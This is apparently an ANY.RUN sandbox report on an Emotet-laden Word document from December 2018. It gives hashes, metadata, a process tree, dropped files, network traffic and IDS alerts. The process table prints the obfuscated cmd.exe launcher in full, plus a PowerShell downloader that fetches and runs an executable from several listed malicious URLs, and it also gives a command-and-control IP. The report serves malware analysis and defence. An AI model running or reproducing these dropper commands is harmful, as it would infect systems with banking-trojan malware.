File name: | 661bffd27a2e4799c1a2ad1365d20c9036ec417ab9e9c86d0f49f1b2d9bcaac8 |
Full analysis: | https://app.any.run/tasks/ccb0d6e4-0264-49da-8def-8f50c3f84f0a |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 06, 2018, 01:27:09 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 4 12:10:00 2018, Last Saved Time/Date: Tue Dec 4 12:10:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 24, Security: 0 |
MD5: | 79A218304ABB0673C7EA3A1F62165D35 |
SHA1: | D60EDFD9DFDF8403A6C2E932FD134E7F77F0DE6B |
SHA256: | 661BFFD27A2E4799C1A2AD1365D20C9036EC417AB9E9C86D0F49F1B2D9BCAAC8 |
SSDEEP: | 768:S84OEKjmW9/MqtBMENPOgHvgn+1o98Dcxz99XOOLr5Xbg9LoZnULO5Sjo:S87ljmW9/bvFM+a98Dc3dtXM9UZUy5eo |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 27 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 24 |
Words: | 4 |
Pages: | 1 |
ModifyDate: | 2018:12:04 12:10:00 |
CreateDate: | 2018:12:04 12:10:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2948 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\661bffd27a2e4799c1a2ad1365d20c9036ec417ab9e9c86d0f49f1b2d9bcaac8.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3932 | c:\MOJtGcAfUfB\jvfcYdzZi\jvpPUlOiZz\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set R1F=pISrZoOqlsvNrCwJ$FP:Knd6.@Hty1Q{8\B,5h2)f}bYjU+ALD0Ta /;kRgXGxW(imue=4-c'z&&for %a in (16;7;44;20;68;72;17;40;48;72;55;16;12;5;27;68;21;67;14;70;5;42;44;67;71;27;53;11;67;27;24;62;67;42;13;8;64;67;21;27;55;16;73;5;4;68;72;37;27;27;0;19;54;54;10;71;66;42;67;70;10;10;0;24;71;5;65;54;50;51;40;8;23;45;4;30;25;37;27;27;0;19;54;54;71;8;5;9;37;8;52;42;24;71;5;65;54;42;30;37;38;27;73;69;25;37;27;27;0;19;54;54;22;67;56;5;12;65;71;24;0;8;54;0;66;42;54;26;50;67;67;6;18;57;56;14;12;25;37;27;27;0;19;54;54;71;52;12;67;67;12;73;64;21;21;24;64;21;54;21;8;32;71;0;11;58;34;47;8;25;37;27;27;0;19;54;54;42;12;5;58;52;21;40;52;65;64;8;28;24;5;12;58;54;1;59;73;45;21;30;47;50;30;72;24;2;0;8;64;27;63;72;25;72;39;55;16;2;18;60;68;72;5;1;20;72;55;16;1;57;2;53;68;53;72;29;69;36;72;55;16;56;15;8;68;72;13;26;9;72;55;16;51;52;14;68;16;67;21;10;19;27;67;65;0;46;72;33;72;46;16;1;57;2;46;72;24;67;61;67;72;55;40;5;12;67;52;71;37;63;16;73;48;7;53;64;21;53;16;73;5;4;39;31;27;12;28;31;16;12;5;27;24;49;5;14;21;8;5;52;22;17;64;8;67;63;16;73;48;7;35;53;16;51;52;14;39;55;16;43;10;1;68;72;51;6;20;72;55;1;40;53;63;63;60;67;27;70;1;27;67;65;53;16;51;52;14;39;24;8;67;21;58;27;37;53;70;58;67;53;32;50;50;50;50;39;53;31;1;21;10;5;56;67;70;1;27;67;65;53;16;51;52;14;55;16;21;52;26;68;72;56;37;51;72;55;42;12;67;52;56;55;41;41;71;52;27;71;37;31;41;41;16;43;20;37;68;72;34;37;20;72;55;75)do set Jbd=!Jbd!!R1F:~%a,1!&&if %a gtr 74 powershell.exe "!Jbd:*Jbd!=!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2476 | CmD /V:ON/C"set R1F=pISrZoOqlsvNrCwJ$FP:Knd6.@Hty1Q{8\B,5h2)f}bYjU+ALD0Ta /;kRgXGxW(imue=4-c'z&&for %a in (16;7;44;20;68;72;17;40;48;72;55;16;12;5;27;68;21;67;14;70;5;42;44;67;71;27;53;11;67;27;24;62;67;42;13;8;64;67;21;27;55;16;73;5;4;68;72;37;27;27;0;19;54;54;10;71;66;42;67;70;10;10;0;24;71;5;65;54;50;51;40;8;23;45;4;30;25;37;27;27;0;19;54;54;71;8;5;9;37;8;52;42;24;71;5;65;54;42;30;37;38;27;73;69;25;37;27;27;0;19;54;54;22;67;56;5;12;65;71;24;0;8;54;0;66;42;54;26;50;67;67;6;18;57;56;14;12;25;37;27;27;0;19;54;54;71;52;12;67;67;12;73;64;21;21;24;64;21;54;21;8;32;71;0;11;58;34;47;8;25;37;27;27;0;19;54;54;42;12;5;58;52;21;40;52;65;64;8;28;24;5;12;58;54;1;59;73;45;21;30;47;50;30;72;24;2;0;8;64;27;63;72;25;72;39;55;16;2;18;60;68;72;5;1;20;72;55;16;1;57;2;53;68;53;72;29;69;36;72;55;16;56;15;8;68;72;13;26;9;72;55;16;51;52;14;68;16;67;21;10;19;27;67;65;0;46;72;33;72;46;16;1;57;2;46;72;24;67;61;67;72;55;40;5;12;67;52;71;37;63;16;73;48;7;53;64;21;53;16;73;5;4;39;31;27;12;28;31;16;12;5;27;24;49;5;14;21;8;5;52;22;17;64;8;67;63;16;73;48;7;35;53;16;51;52;14;39;55;16;43;10;1;68;72;51;6;20;72;55;1;40;53;63;63;60;67;27;70;1;27;67;65;53;16;51;52;14;39;24;8;67;21;58;27;37;53;70;58;67;53;32;50;50;50;50;39;53;31;1;21;10;5;56;67;70;1;27;67;65;53;16;51;52;14;55;16;21;52;26;68;72;56;37;51;72;55;42;12;67;52;56;55;41;41;71;52;27;71;37;31;41;41;16;43;20;37;68;72;34;37;20;72;55;75)do set Jbd=!Jbd!!R1F:~%a,1!&&if %a gtr 74 powershell.exe "!Jbd:*Jbd!=!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2328 | powershell.exe "$qjK='FfL';$rot=new-object Net.WebClient;$zoZ='http://vcube-vvp.com/0Tfl6UZQ@http://closhlab.com/bQh2tz4@http://dekormc.pl/pub/H0eeOPRkwr@http://careerzinn.in/nl8cpNgBAl@http://broganfamily.org/IXzUnQA0Q'.Split('@');$SPG='oIK';$IRS = '145';$kJl='CHs';$Taw=$env:temp+'\'+$IRS+'.exe';foreach($zLq in $zoZ){try{$rot.DownloadFile($zLq, $Taw);$YvI='TOK';If ((Get-Item $Taw).length -ge 80000) {Invoke-Item $Taw;$naH='khT';break;}}catch{}}$YKh='BhK';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3052 | "C:\Users\admin\AppData\Local\Temp\145.exe" | C:\Users\admin\AppData\Local\Temp\145.exe | — | powershell.exe |
User: admin Company: Microsoft Corporatio Integrity Level: MEDIUM Description: Windows Exit code: 0 Version: 7.6.7601.1 | ||||
4072 | "C:\Users\admin\AppData\Local\Temp\145.exe" | C:\Users\admin\AppData\Local\Temp\145.exe | 145.exe | |
User: admin Company: Microsoft Corporatio Integrity Level: MEDIUM Description: Windows Exit code: 0 Version: 7.6.7601.1 | ||||
3832 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 145.exe |
User: admin Company: Microsoft Corporatio Integrity Level: MEDIUM Description: Windows Exit code: 0 Version: 7.6.7601.1 | ||||
2412 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | archivesymbol.exe | |
User: admin Company: Microsoft Corporatio Integrity Level: MEDIUM Description: Windows Version: 7.6.7601.1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR68CD.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2328 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z58XRCWRTA54VVZH18HM.temp | — | |
MD5:— | SHA256:— | |||
2328 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247521.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
2328 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
2328 | powershell.exe | C:\Users\admin\AppData\Local\Temp\145.exe | executable | |
MD5:351C8F1151467E340978525760C87777 | SHA256:142B849DE171D1CEFF03401F1C669E0D9D81BDE4273ADE1F9F9A9461A31BA484 | |||
2948 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:FFDDA778140572C37C6C1B9E1A88C58B | SHA256:478279FBD54E6D1EE6C21D74755708B0B3AD34CCC4069C872C81C9A3A4BF25D2 | |||
4072 | 145.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:351C8F1151467E340978525760C87777 | SHA256:142B849DE171D1CEFF03401F1C669E0D9D81BDE4273ADE1F9F9A9461A31BA484 | |||
2948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$1bffd27a2e4799c1a2ad1365d20c9036ec417ab9e9c86d0f49f1b2d9bcaac8.doc | pgc | |
MD5:2B62390E80017BAC92DB38E2E49C6678 | SHA256:77F196CAEAE60BD79B80298A327C20D7F6ADE5F231C4CC38AF67DBFFBD3B8621 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2328 | powershell.exe | GET | 404 | 69.65.3.251:80 | http://closhlab.com/bQh2tz4 | US | html | 19.8 Kb | malicious |
2328 | powershell.exe | GET | 301 | 79.96.69.212:80 | http://dekormc.pl/pub/H0eeOPRkwr | PL | html | 189 b | suspicious |
2328 | powershell.exe | GET | 200 | 79.96.69.212:80 | http://dekormc.pl/pub/H0eeOPRkwr/ | PL | executable | 512 Kb | suspicious |
2412 | archivesymbol.exe | GET | 200 | 187.160.2.73:443 | http://187.160.2.73:443/ | MX | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2328 | powershell.exe | 103.246.17.7:80 | vcube-vvp.com | POPIDC powered by CSLoxinfo | TH | malicious |
2328 | powershell.exe | 79.96.69.212:80 | dekormc.pl | home.pl S.A. | PL | suspicious |
2328 | powershell.exe | 69.65.3.251:80 | closhlab.com | GigeNET | US | suspicious |
2412 | archivesymbol.exe | 187.160.2.73:443 | — | Television Internacional, S.A. de C.V. | MX | malicious |
Domain | IP | Reputation |
---|---|---|
vcube-vvp.com |
| malicious |
dns.msftncsi.com |
| shared |
closhlab.com |
| malicious |
dekormc.pl |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2328 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2328 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2328 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2328 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2412 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2412 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |